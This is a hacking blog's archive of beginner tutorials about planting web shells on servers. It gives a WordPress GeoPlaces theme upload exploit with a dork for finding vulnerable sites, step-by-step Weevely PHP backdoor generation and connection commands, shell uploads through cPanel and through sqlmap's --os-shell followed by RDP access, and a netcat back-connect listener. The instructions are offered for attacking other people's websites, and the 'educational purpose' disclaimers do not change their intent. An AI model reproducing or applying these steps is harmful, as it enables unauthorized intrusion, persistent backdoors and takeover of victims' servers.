Category Archives: Shell

WordPress Shell Upload Vulnerability ! GeoThemes

~
 
WordPress Shell Upload Vulnerability In GeoThemes XD
# Exploit Title: WordPress GeoPlaces Themes >> upload shell exploit
# Date: 1/6/2013
# Author: xmayaroos
# Home: http://www.geotheme.com/
# Tested on: opera
# Dork : “inurl:wp-content/themes/GeoPlaces/”

[b]
exploit : Go to wp-content/themes/GeoPlaces/monetize/upload
then upload your shell
your shell >>> wp-content/uploads/2013/06/01010101shell010101.php

Enjoy 😀

How To BackDoor Server ?

~
How To BackDoor A Server Using Weevely ?
Umm..
in this tutorial i’ll tell you how to backdoor server using weevely 😀
Weevely Is My Favorite BackDoor 😀
What Is Weevely ?
Weevely is a PHP web shell that provides a telnet-like console to execute system commands and automatize administration and post-exploitation tasks.
Just generate and upload the PHP code on the target web server, and run the Weevely client locally to transmit shell commands.
 Benefits ?
Small In Size 
No Need Of Port Forwarding 😀 😛

 How To Create BackDoor ?

 Open Backtrack Terminal , Than Type :
cd /pentest/backdoors/web/weevely 
than hit enter
thank you’ll get something like
LeeT@bt:/pentest/backdoors/web/weevely#
now type:
LeeT@bt:/pentest/backdoors/web/weevely# ./weevely.py generate rooT root/Desktop/backdoor.php

Explanation ,
./weevely = ” ./ ” its mean execution ” .py ” its mean python “
” root its your password 😀 you can change it 🙂 ”
“generate its mean to generate backdoor “
” root/Desktop/backdoor.php its your path where backdoor will be generated “

  How To Connect Back To Server ?

After The BackDoor Created , You Can Easily Connect Back To Server Like NetCat 😀
For This , Upload Your backdoor.php to your shelled website 🙂 or directly from admin panel
 than type in terminal,
LeeT@bt:/pentest/backdoors/web/weevely# ./weevely.py http://target.com/backdoor.php rooT
  and you’ll be connected to your server 🙂
You Can Also Use Proxy ,
To run Weevely through an HTTP proxy set the shell.php proxy parameter in the default rc file: 
$ cat ~/.weevely/weevely.rc 
:set shell.php -proxy "http://myproxy.com:8123" 
$ ./weevely.py http://target.org/w.php p4ssw0rd ":system.info client_ip"
myproxy.com
www-data@target.com:/var/www/$
Note:Please Do Not Leech
Written By Zaid Sparrow
For educational Purpose Only!

How To Upload Shell ?

~
Shell Uploading Through cPanel!
In This tut ill tell y0uh 
How to upload shell through cPanel
Or
Shelling Website from cPanel

Well this tut is just for beginners
Plz dont abuse!
===============================================
so what y0u need ?
1st cPanel

2nd Madspot Shell V2 (awaaasome)


Now , open cPanel and goto 
Legacy File Manager 


than => Webroot Folder => Go


In New Tab , y0u’ll see Upload Files button 
press upload files Button and select y0ur shell and Click on upload!
\m/ Zindabad \m/
Shell Uploaded 🙂

Thankx For Reading
Note:For Educational Purpose ONLY!!!

tut officially written By Zaid Sparrow aka T4p10N

How To Upload Shell Using SQLMAP than get RDP

~
Hey Salam Guyz
Today i’ll tell y0uh 
Shell Uploading through SQLmap

its very easy if you have few thing 😉

-1st-
Vulnerable website with full path
-2nd-
file write privilleges
-3rd-
sqlmap
-4th-
Me 😀

start it

open your sqlmap
i have sqlmap with its GUI
so work becomes very easy 😀
you can also use sqlmap shell without its GUI just type this
./sqlmap.py -u http:www.site.in/index.php?id=1 –os-shell

link to use sqlmap with GUI
1st tick on the url box
now paste the vulnerable link in target box
than click on Get Query and you’ll see website appears on the 
“Query To Sqlmap box”
like in picture
Now 0pen “Access” tab in sqlmap
than => operating System
than => sqlshell
and tick sqlshell 
then again click on Get query
Than click on start button
than windows will pop up after 1-2 minutes 
it will ask y0u f0r enter Web application Language
like in this pic
web server is mysql so i’ll choose 4 PHP (Default)
it will start working again
and than asked y0u to give web root path
“Web Root Path”
the text y0u g0t from error like
mysql_error /home/india/public_html
this is called web root path

in my case my root path is
mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\xampp\htdocs\DavWeb\src\controllers\photocontroller.php
my root path =>
C:\xampp\htdocs\DavWeb\
sometimes SQLMAP automatically get the root path like in this pic

please provide any additional web server full path to try to upload the agent 
[Enter for None]:
just press Enter


wOha! Shell uploaded =))

it will automatically connect the shell with sqlmap/cmd
Pic =>


shell uploaded =>

========================================
you can als0 get RDP from the shell 😛

just type in Run =>
mstsc.exe and enter website’s ip
and enter your password and enjoy 😀

thankx for reading 

Note:For Educational Purpose Only

How To BackConnect With NetCat

~
In This TuT i’ll sH0w Y0uH
How To BackConnect With NetCat

lots of beginner hackers dont know what is netcat
what is backconnect

What Is NetCat ?
i w0nt tell y0uh full explanation , but
but we use it for backconnecting thats awll 😛 😛
========================================================================

so lets get y0ur hands Buzzy !!

Things Y0u’ll Need
1) NetCat 
2) backconnect supported Shell
Best Shell Is Madspot Shell
3) Router for port forwarding 🙂
Port Forwarding Tutorial
we will open port 443 🙂

Now open netcat and type nc -lvp 443 and hit enter
then something like that will appear



open y0ur shell and goto back connect Tab

and enter 443 port after forwarding 🙂
then click On >> button

and check y0ur nc y0u’ll be connected t0 server 🙂


Thankx for reading 
Note:For Educational Purpose ONLY!
officially written by Zaid Sparrow Aka T4p10N